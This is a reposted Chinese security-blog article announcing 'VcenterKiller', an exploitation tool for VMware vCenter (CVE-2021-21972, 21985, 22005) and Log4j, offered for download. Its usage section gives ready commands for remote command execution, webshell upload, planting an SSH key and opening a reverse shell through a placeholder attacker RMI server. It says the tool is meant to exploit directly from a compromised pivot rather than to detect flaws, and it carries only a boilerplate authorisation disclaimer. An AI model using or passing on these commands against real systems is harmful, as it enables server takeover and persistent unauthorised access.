【神兵利器 | New】分享一款VMware vCenter漏洞综合利用Tools(附下载)
2022-10-7 21:50:20 Author: 渗透Xiao白帽(查看原文) 阅读量:47 收藏

0.必读

目前本工具处于刚上线阶段,可能会有很多BUG,如果遇到bug请提issue

目前集成了对Vcenter log4j漏洞的检测和利用功能,思路来自于带哥@j5s的项目SuperFastjsonScan,原理参考Golang实现RMI协议自动化检测Fastjson,简单来说就是不借助dnslog之类的平台,只要你和目标主机是通的并且你的主机/跳板没有被防火墙做端口限制,那就能直接验证目标是否远程调用了你的rmi服务。

后续会集成基于CVE-2021-21985一键添加管理员用户的功能,这样就不必非要先拿shell,再通过python在服务器执行ldap_adduer脚本了,总之有更好的方式。

后续

Vmware workstation One Access ...

VMware vRealize Operations Manager ...

1.它是什么

一款针对Vcenter(暂时)的综合验证工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-2205,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测和验证。

2.它的定位

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出。

为什么用GO,因为Python写起来方便但是用起来很蛋疼,各种依赖库,编译吧体积太大,C#没法跨平台,写到一半扔了。

3.使用方法

go build -o main.exe

./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
./main.exe -u https://192.168.1.1 -m log4center -t rshell -r rmi://xx.xx.xx.xx:1099/xx //get reverseshell

4.免责声明

本工具仅面向合法授权的企业安全建设行为,例如企业内部攻防演练、漏洞验证和复测,如您需要测试本工具的可用性,请自行搭建靶机环境。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标使用。

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

5.更新日志

V1.0 上线
V1.1 针对CVE-2021-21985添加了利用rmi反弹shell的功能,前提是你要启动一个rmi服务器,例如jndi-injection-exploit
V1.2 增加了针对Vcenter的log4j检测和验证能力
...

后台回复"vCenter"即可获取

OR

阅读原文也可获取下载链接

一如既往的学习,一如既往的整理,一如即往的分享

如侵权请私聊公众号删文

推荐阅读


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247493887&idx=1&sn=d1f34fdd54e0b6646dd4569cd3bafc6f&chksm=ea3417a5dd439eb3b589b57c503748b3d9bdf0198062ee157fd5dd8faabc7e1cf193ec37c965#rd
如有侵权请联系:admin#unsafe.sh